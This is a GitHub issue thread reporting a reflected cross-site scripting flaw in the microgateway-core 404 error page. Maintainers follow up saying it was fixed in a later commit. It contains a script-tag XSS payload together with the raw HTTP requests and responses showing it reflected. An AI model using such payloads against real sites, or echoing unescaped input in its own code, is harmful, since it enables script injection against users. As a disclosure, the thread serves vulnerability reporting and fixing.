### ISSUE TITLE
xss vulnerability

### ISSUE THREAD

**Issue by tcz001** [apigee/microgateway-core#103]
Hi Apigee team,

[This](https://github.com/apigee/microgateway-core/blob/ff126b19cabf4ae1695f3a41b9eae92cd9184954/lib/config-proxy-middleware.js#L114
) error page rendered will introduce a XSS vulnerability.

Detailed sample:

GET /&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; HTTP/1.1
Host: scdci0000097.cn.bg.corpintra.net:10080
Connection: Keep-Alive

HTTP/1.1 404 Not Found
Date: Fri, 28 Sep 2018 04:35:37 GMT
Connection: keep-alive
Content-Length: 89

{&quot;message&quot;:&quot;no match found for /\&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&quot;,&quot;status&quot;:404}GET /&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;.html HTTP/1.1
Host: scdci0000097.cn.bg.corpintra.net:10080
Connection: Keep-Alive

HTTP/1.1 404 Not Found
Date: Fri, 28 Sep 2018 04:35:38 GMT
Connection: keep-alive
Content-Length: 94

{&quot;message&quot;:&quot;no match found for /\&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;.html&quot;,&quot;status&quot;:404}

**Comment by srinandan** [comment]
there is a new PR that fixes this problem.

**Comment by dawncold** [comment]
It's done on the latest release

**Comment by relloller** [comment]
what node version did this occur on?

**Comment by dawncold** [comment]
@relloller Fixed from this commit: https://github.com/apigee/microgateway-core/commit/bba8cc28394042751494384c1a767e56cbceb1d1

It doesn't relate to nodejs.
